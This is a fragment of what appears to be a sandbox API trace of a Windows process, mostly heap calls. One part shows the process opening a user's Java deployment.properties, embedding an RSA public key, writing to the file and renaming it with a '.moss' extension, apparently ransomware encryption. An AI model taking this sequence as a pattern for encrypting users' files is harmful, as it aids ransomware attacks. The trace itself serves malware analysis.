(in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0173.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0173.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.042] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0173.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0173.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f1c8 [0173.043] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0173.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0173.043] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0173.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0173.043] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0173.043] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57ba0 [0173.043] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0173.043] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.043] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.043] PathFindFileNameW (pszPath="") returned="" [0173.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.043] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.045] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned=".properties" [0173.045] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0173.045] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=719) returned 1 [0173.045] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0173.049] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x2a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.049] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0173.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0173.051] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x2cf, lpOverlapped=0x0) returned 1 [0173.051] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0173.052] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.052] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.052] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f1c8) returned 1 [0173.053] CryptCreateHash (in: hProv=0xd2f1c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0173.053] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0173.053] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0173.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0173.053] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0173.053] GetLastError () returned 0x0 [0173.053] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0173.053] CryptReleaseContext (hProv=0xd2f1c8, dwFlags=0x0) returned 1 [0173.053] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0173.053] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0173.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0173.053] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0173.053] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0173.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b44498 [0173.054] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x2cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.054] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0173.054] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.moss")) returned 1 [0173.056] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.056] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cf88 [0173.057] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0173.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.060] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.060] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.060] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.060] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.060] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.060] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.060] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.060] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.060] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.060] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.060] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.060] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.060] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.060] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.060] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.060] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.060] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.060] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.060] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.060] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.060] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.060] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0173.060] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.060] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.060] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.060] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0173.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: 